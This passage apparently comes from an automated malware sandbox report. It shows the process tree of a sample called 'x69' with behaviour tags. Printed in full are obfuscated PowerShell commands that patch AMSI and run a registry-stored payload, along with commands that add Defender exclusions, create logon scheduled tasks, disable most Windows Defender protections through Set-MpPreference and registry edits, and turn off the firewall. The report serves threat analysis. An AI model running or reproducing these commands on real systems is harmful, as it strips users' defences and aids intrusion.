ineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+'P'+'u'+[Char](98)+'li'+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+''+'d'+'eB'+[Char](121)+'S'+[Char](105)+'g,'+'N'+''+'e'+''+[Char](119)+''+[Char](83)+''+'l'+''+'o'+''+'t'+''+[Char](44)+''+'V'+''+[Char](105)+'r'+'t'+''+[Char](117)+'a'+[Char](108)+'',$SZhzBExtBK,$EGyTRphnVKuFwK).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+'a'+[Char](103)+'ed');Write-Output $anWgFXQPnMo.CreateType();}$QVErDwZqdeeSw=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+'s'+''+'t'+''+'e'+''+[Char](109)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType('M'+[Char](105)+''+'c'+'ro'+'s'+''+[Char](111)+''+[Char](102)+''+'t'+''+'.'+''+'W'+'i'+[Char](110)+'3'+'2'+''+[Char](46)+''+'U'+''+[Char](110)+'s'+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+'at'+[Char](105)+''+'v'+''+[Char](101)+'M'+[Char](101)+''+'t'+''+[Char](104)+''+'o'+''+[Char](100)+''+[Char](115)+'');$ASWRkXIrmAKEjJ=$QVErDwZqdeeSw.GetMethod('G'+'e'+''+[Char](116)+''+'P'+''+'r'+'o'+'c'+''+'A'+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+'c'+','+''+'S'+''+'t'+''+[Char](97)+'t'+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$lkbVUXvgrIsctGOmmOe=gwjpPDXdjkay @([String])([IntPtr]);$mAfbTdbxxfDadunDNGCeia=gwjpPDXdjkay @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$fEOFZTTGPJH=$QVErDwZqdeeSw.GetMethod(''+[Char](71)+''+[Char](101)+'tM'+[Char](111)+''+[Char](100)+''+'u'+''+'l'+'e'+[Char](72)+''+[Char](97)+''+[Char](110)+''+'d'+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+'r'+''+[Char](110)+''+[Char](101)+''+'l'+''+[Char](51)+''+'2'+'.'+[Char](100)+'ll')));$ReZDSaRdXaeEhN=$ASWRkXIrmAKEjJ.Invoke($Null,@([Object]$fEOFZTTGPJH,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+'br'+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$EOeVtdgxRABKatLMa=$ASWRkXIrmAKEjJ.Invoke($Null,@([Object]$fEOFZTTGPJH,[Object](''+[Char](86)+'i'+[Char](114)+'t'+'u'+'alPr'+'o'+'t'+[Char](101)+''+[Char](99)+''+'t'+'')));$nMDYmQs=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ReZDSaRdXaeEhN,$lkbVUXvgrIsctGOmmOe).Invoke('a'+[Char](109)+''+[Char](115)+'i'+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'');$fzaAOoamoSPhzDgTe=$ASWRkXIrmAKEjJ.Invoke($Null,@([Object]$nMDYmQs,[Object](''+[Char](65)+''+[Char](109)+''+'s'+''+'i'+''+'S'+''+'c'+''+'a'+''+'n'+''+[Char](66)+'u'+'f'+'f'+[Char](101)+''+[Char](114)+'')));$Ivpcqfqpxz=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EOeVtdgxRABKatLMa,$mAfbTdbxxfDadunDNGCeia).Invoke($fzaAOoamoSPhzDgTe,[uint32]8,4,[ref]$Ivpcqfqpxz);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$fzaAOoamoSPhzDgTe,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EOeVtdgxRABKatLMa,$mAfbTdbxxfDadunDNGCeia).Invoke($fzaAOoamoSPhzDgTe,[uint32]8,0x20,[ref]$Ivpcqfqpxz);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+[Char](84)+'WA'+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](120)+''+'6'+''+[Char](57)+''+[Char](115)+'tag'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4348
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:wndeDcOuxJyW{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$cqOPlRudTeSnnN,[Parameter(Position=1)][Type]$aBdREcctId)$KLyzITCmmIs=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+[Char](108)+''+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+'le'+[Char](103)+''+[Char](97)+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'Me'+[Char](109)+''+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+'l'+'e',$False).DefineType(''+'M'+'y'+'D'+'el'+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+'T'+''+[Char](121)+''+[Char](112)+'e','C'+[Char](108)+''+'a'+''+'s'+''+'s'+''+','+''+[Char](80)+'u'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+'a'+'l'+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+'n'+[Char](115)+'i'+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+','+''+'A'+'u'+[Char](116)+'o'+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$KLyzITCmmIs.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+[Char](112)+'e'+[Char](99)+''+[Char](105)+'a'+[Char](108)+'N'+'a'+''+[Char](109)+'e'+[Char](44)+'H'+[Char](105)+''+[Char](100)+'e'+'B'+'y'+'S'+'i'+'g'+''+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$cqOPlRudTeSnnN).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+'M'+''+'a'+''+'n'+''+[Char](97)+''+[Char](103)+''+'e'+'d');$KLyzITCmmIs.DefineMethod(''+[Char](73)+'n'+'v'+''+[Char](111)+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+','+''+'H'+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+'i'+''+[Char](103)+''+','+''+[Char](78)+'e'+'w'+''+[Char](83)+''+'l'+''+[Char](111)+'t,'+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$aBdREcctId,$cqOPlRudTeSnnN).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+'t'+''+'i'+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $KLyzITCmmIs.CreateType();}$GAEdqfBeOtXRU=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+'t'+[Char](101)+''+[Char](109)+''+'.'+'d'+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'rosoft'+'.'+''+'W'+''+[Char](105)+'n3'+'2'+''+[Char](46)+'U'+'n'+''+'s'+'a'+[Char](102)+''+[Char](101)+''+'N'+''+'a'+''+[Char](116)+'iv'+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$jFokKXmvUCMqXx=$GAEdqfBeOtXRU.GetMethod(''+'G'+''+'e'+'t'+[Char](80)+''+[Char](114)+'oc'+'A'+''+'d'+''+[Char](100)+'r'+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+'b'+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+'a'+''+[Char](116)+''+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$BeVuaQsZPkIBjfUtdcw=wndeDcOuxJyW @([String])([IntPtr]);$hSBXIQwXtoyHXUDcycnAeO=wndeDcOuxJyW @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$MOqpBmKFIuF=$GAEdqfBeOtXRU.GetMethod(''+'G'+''+[Char](101)+''+'t'+''+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+'H'+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+'e'+''+'l'+'3'+[Char](50)+''+'.'+'d'+'l'+'l')));$lOXpkLenleHsgM=$jFokKXmvUCMqXx.Invoke($Null,@([Object]$MOqpBmKFIuF,[Object]('L'+[Char](111)+''+[Char](97)+''+'d'+''+'L'+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+'a'+''+[Char](114)+'y'+[Char](65)+'')));$BNkFFxcqxhXuJFhoN=$jFokKXmvUCMqXx.Invoke($Null,@([Object]$MOqpBmKFIuF,[Object](''+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+'l'+[Char](80)+''+[Char](114)+'o'+[Char](116)+'e'+[Char](99)+''+'t'+'')));$cLbnIeA=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($lOXpkLenleHsgM,$BeVuaQsZPkIBjfUtdcw).Invoke('a'+[Char](109)+''+[Char](115)+''+[Char](105)+'.'+[Char](100)+'l'+[Char](108)+'');$wCVQpXLlZspVveqCi=$jFokKXmvUCMqXx.Invoke($Null,@([Object]$cLbnIeA,[Object](''+[Char](65)+''+[Char](109)+'s'+[Char](105)+''+[Char](83)+''+[Char](99)+''+'a'+''+[Char](110)+''+'B'+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$xDvWZkIXPW=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BNkFFxcqxhXuJFhoN,$hSBXIQwXtoyHXUDcycnAeO).Invoke($wCVQpXLlZspVveqCi,[uint32]8,4,[ref]$xDvWZkIXPW);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$wCVQpXLlZspVveqCi,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BNkFFxcqxhXuJFhoN,$hSBXIQwXtoyHXUDcycnAeO).Invoke($wCVQpXLlZspVveqCi,[uint32]8,0x20,[ref]$xDvWZkIXPW);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+'F'+[Char](84)+''+[Char](87)+'A'+[Char](82)+''+'E'+'').GetValue(''+[Char](120)+''+'6'+''+[Char](57)+''+'s'+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4192
-
-
C:\Users\Admin\AppData\Roaming\x69.exeC:\Users\Admin\AppData\Roaming\x69.exe2⤵
- Executes dropped EXE
PID:6132
-
-
C:\Users\Admin\AppData\Roaming\x69.exeC:\Users\Admin\AppData\Roaming\x69.exe2⤵
- Executes dropped EXE
PID:2132
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1288
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1324
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1396
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1456
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1476
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2912
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1508
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1524
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1652
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1688
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1744
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1784
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1832
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1948
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1956
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2004
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2044
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2064
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2144
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2172
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2316
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2428
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2436
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
PID:2664
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2704
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2728
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2752
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2768
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2944
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3032
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:3140
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3404
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of UnmapMainImage
PID:3528 -
C:\Users\Admin\AppData\Local\Temp\x69.exe"C:\Users\Admin\AppData\Local\Temp\x69.exe"2⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2884 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:856
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "x69" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:3416
-
-
C:\Users\Admin\AppData\Roaming\x69.exe"C:\Users\Admin\AppData\Roaming\x69.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:864
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2260
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /F /TN "x69Disable-winDefender" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:928
-
-
C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1848 -
C:\Users\Admin\AppData\Local\Temp\izTLZKj.exeC:\Users\Admin\AppData\Local\Temp\izTLZKj.exe4⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:1048 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\771043f8.bat" "5⤵
- System Location Discovery: System Language Discovery
PID:3108 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:4484
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C15C.tmp\C15D.tmp\C15E.bat C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:4916 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3416
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3760
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2020
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4888
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5052
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3344
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableArchiveScanning $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1896
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2268
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -DisableScriptScanning $true"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4980
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2868
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -MAPSReporting 0"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3424
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4268
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:3572
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4684
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:1928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4676 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f6⤵PID:3708
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "REG ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:4896 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD ΓÇ£hklm\software\policies\microsoft\windows defenderΓÇ¥ /v DisableAntiSpyware /t REG_DWORD /d 1 /f6⤵PID:5096
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -command "netsh advfirewall set allprofiles state off"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:2868 -
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3708
-
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f5⤵PID:5156
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender DisableAntiSpyware settings
PID:5180
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f5⤵PID:5196
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f5⤵PID:5228
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:5256
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:5280
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:5308
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:5332
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f5⤵
- Modifies Windows Defender Real-time Protection settings
PID:5360
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f5⤵PID:5384
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f5⤵PID:5416
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f5⤵PID:5444
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f5⤵PID:5476
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f5⤵PID:5504
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f5⤵PID:5532
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable5⤵PID:5556
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable5⤵PID:5576
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable5⤵PID:5620
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable5⤵PID:5644
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable5⤵PID:5676
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f5⤵PID:5708
-
-
